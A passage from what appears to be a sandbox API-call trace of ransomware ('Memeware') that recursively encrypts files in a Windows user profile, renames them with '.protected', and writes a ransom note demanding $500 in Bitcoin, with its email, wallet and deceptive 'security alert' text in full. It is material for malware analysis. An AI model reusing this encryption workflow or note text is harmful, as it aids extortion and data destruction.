lpNewFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.protected" (normalized: "c:\\users\\default\\downloads\\desktop.ini.protected")) returned 1 [0095.142] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.142] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.142] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\RESTORE_FILES.txt") returned 48 [0095.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\downloads\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.143] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.143] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.143] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.143] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.144] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.144] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.144] CloseHandle (hObject=0xa4) returned 1 [0095.144] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.144] lstrcmpiW (lpString1="Favorites", lpString2="Windows") returned -1 [0095.144] lstrcmpiW (lpString1="Favorites", lpString2="Program Files") returned -1 [0095.144] lstrcmpiW (lpString1="Favorites", lpString2="Program Files (x86)") returned -1 [0095.144] lstrcmpiW (lpString1="Favorites", lpString2="$Recycle.bin") returned 1 [0095.144] lstrcmpiW (lpString1="Favorites", lpString2="System Volume Information") returned -1 [0095.144] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites") returned 30 [0095.144] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0095.144] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0095.144] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\*") returned 32 [0095.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.146] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.146] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.146] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.146] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.146] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.146] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\.") returned 32 [0095.147] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.147] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.147] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.147] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\." (normalized: "c:\\users\\default\\favorites\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.147] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.147] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.147] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.147] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.147] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.147] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.147] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\..") returned 33 [0095.147] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.147] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.147] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.147] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.147] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.147] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.147] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.147] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.147] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.147] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.148] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.148] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0095.148] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.148] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.148] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.148] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.148] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0095.148] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.148] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0095.148] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.148] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0095.148] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.148] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0095.149] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.149] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0095.149] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.150] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.150] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.150] CloseHandle (hObject=0xb4) returned 1 [0095.150] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.protected") returned 52 [0095.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.protected" (normalized: "c:\\users\\default\\favorites\\desktop.ini.protected")) returned 1 [0095.151] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.151] lstrcmpiW (lpString1="Links", lpString2="Windows") returned -1 [0095.151] lstrcmpiW (lpString1="Links", lpString2="Program Files") returned -1 [0095.151] lstrcmpiW (lpString1="Links", lpString2="Program Files (x86)") returned -1 [0095.151] lstrcmpiW (lpString1="Links", lpString2="$Recycle.bin") returned 1 [0095.151] lstrcmpiW (lpString1="Links", lpString2="System Volume Information") returned -1 [0095.151] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned 36 [0095.151] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0095.151] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0095.151] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*") returned 38 [0095.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.151] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.151] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.151] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.151] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.151] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.151] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\.") returned 38 [0095.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.151] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.151] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.151] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.151] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\." (normalized: "c:\\users\\default\\favorites\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.152] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.152] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.152] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.152] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.152] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.152] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.152] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\..") returned 39 [0095.152] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.152] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.152] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.152] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.152] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.152] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\.." (normalized: "c:\\users\\default\\favorites"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.152] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.152] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.152] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.152] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.152] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.152] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.152] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0095.152] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.152] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.152] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.152] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.153] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0095.153] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.153] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0095.153] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.153] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0095.153] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.153] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x50, lpOverlapped=0x0) returned 1 [0095.154] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.154] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x50, lpOverlapped=0x0) returned 1 [0095.154] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.154] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.154] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.154] CloseHandle (hObject=0xd4) returned 1 [0095.155] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.protected") returned 58 [0095.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.protected" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini.protected")) returned 1 [0095.156] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.156] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Windows") returned -1 [0095.156] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Program Files") returned 1 [0095.156] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Program Files (x86)") returned 1 [0095.156] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="$Recycle.bin") returned 1 [0095.156] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="System Volume Information") returned 1 [0095.156] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0095.156] StrStrIW (lpFirst="Web Slice Gallery.url", lpSrch=".protected") returned 0x0 [0095.156] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="RESTORE_FILES.txt") returned 1 [0095.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.156] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0095.156] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".txt") returned 0x0 [0095.156] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0095.156] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".rar") returned 0x0 [0095.156] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0095.156] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".zip") returned 0x0 [0095.156] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xe2, lpOverlapped=0x0) returned 1 [0095.157] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.157] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xe2, lpOverlapped=0x0) returned 1 [0095.158] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.158] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.158] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.158] CloseHandle (hObject=0xd4) returned 1 [0095.159] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.protected") returned 68 [0095.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.protected" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.protected")) returned 1 [0095.160] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.160] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.160] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\RESTORE_FILES.txt") returned 54 [0095.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\favorites\\links\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.172] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.172] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.173] lstrlenA 